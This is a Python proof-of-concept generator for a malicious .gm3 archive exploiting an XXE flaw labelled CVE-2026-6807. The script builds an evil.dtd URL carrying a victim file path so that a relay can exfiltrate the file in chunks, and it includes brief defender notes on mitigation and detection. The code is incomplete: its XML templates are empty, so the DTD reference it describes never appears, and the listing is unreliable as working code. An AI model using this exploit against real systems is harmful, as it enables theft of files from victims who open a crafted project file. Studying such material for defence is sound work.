"""Proof-of-concept generator for the malicious.gm3 archive used with CVE-2026-6807.

The script writes a ZIP archive (the .gm3 container) holding five XML
members. session.xml carries one general-entity reference (&c0;, &c1;, ...)
per expected chunk. Per the original description, the target file path is
passed to a relay via the ?t= query parameter of the DTD URL; the relay reads
the file server-side and serves it back as chunked general entities.

Command-line options:
    -t / --target   path of the file named in the ?t= parameter
    --host, --port  address of the relay listener (defaults to loopback)
    -o / --output   path of the archive to write

Defender notes:
    * Mitigation: the XML parser that loads members of a .gm3 archive should
      reject DOCTYPE declarations, or at least refuse to resolve external
      DTDs and external entities.
    * Detection: opening a project file should not cause the application to
      fetch a DTD over HTTP. A request for a .dtd resource carrying a t=
      parameter, or a session.xml containing long runs of &cN; references,
      matches what this script produces.
"""
import zipfile, base64, argparse, urllib.parse, os

# Defaults: loopback relay, so an unmodified run stays on the local machine.
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 7778
DEFAULT_TARGET = "C:/windows/win.ini"
DEFAULT_OUTPUT = "malicious.gm3"
# Width, in base64 characters, of one chunk; only used to derive the chunk count.
MAX_CHUNK = 150

parser = argparse.ArgumentParser(description="CVE-2026-6807 payload generator")
parser.add_argument("-t", "--target", default=DEFAULT_TARGET,
                    help="File to exfiltrate on the victim")
parser.add_argument("--host", default=DEFAULT_HOST,
                    help="Relay listener host")
parser.add_argument("--port", type=int, default=DEFAULT_PORT,
                    help="Relay listener port")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT,
                    help="Output .gm3 path")
args = parser.parse_args()

# Read target locally to calculate chunk count for entity refs in session.xml
# The file contents are not embedded in the archive: `encoded` and `chunks`
# exist only to compute `n`.
try:
    # Forward slashes in the argument are mapped to the local path separator.
    with open(args.target.replace("/", os.sep), "rb") as f:
        raw = f.read()
    encoded = base64.b64encode(raw).decode()
    chunks = [encoded[i:i+MAX_CHUNK] for i in range(0, len(encoded), MAX_CHUNK)]
    n = len(chunks)
    print(f"[*] {args.target}: {len(raw)} bytes -> {n} chunks")
except FileNotFoundError:
    # Target may not exist locally (remote engagement) — ask for chunk count
    # Only FileNotFoundError is handled here; other I/O errors and a
    # non-numeric answer to the prompt propagate as exceptions.
    n = int(input(f"[?] Target not found locally. How many chunks to expect? "))

# safe="" percent-encodes every reserved character, including "/" and ":",
# so the whole path travels as a single query-parameter value.
encoded_path = urllib.parse.quote(args.target, safe="")
dtd_url = f"http://{args.host}:{args.port}/evil.dtd?t={encoded_path}"

# One reference per chunk: &c0; ... &c{n-1};
entity_refs = "\n ".join(f"&c{i};" for i in range(n))

# NOTE(review): as rendered on this page the three XML templates below contain
# no markup (presumably stripped during extraction), and dtd_url is referenced
# only by the final print. The listing is incomplete in this form.
session_xml = f""" {entity_refs} """
manifest_xml = '\n\n'
stub = '\n\n'

# Assemble the archive: five members, deflate-compressed.
# logical.xml, physical.xml and mesh.xml all receive the same stub content.
with zipfile.ZipFile(args.output, "w", zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("manifest.xml", manifest_xml)
    zf.writestr("session.xml", session_xml)
    zf.writestr("logical.xml", stub)
    zf.writestr("physical.xml", stub)
    zf.writestr("mesh.xml", stub)

print(f"[+] Written {args.output} ({n} entity refs -> {dtd_url})")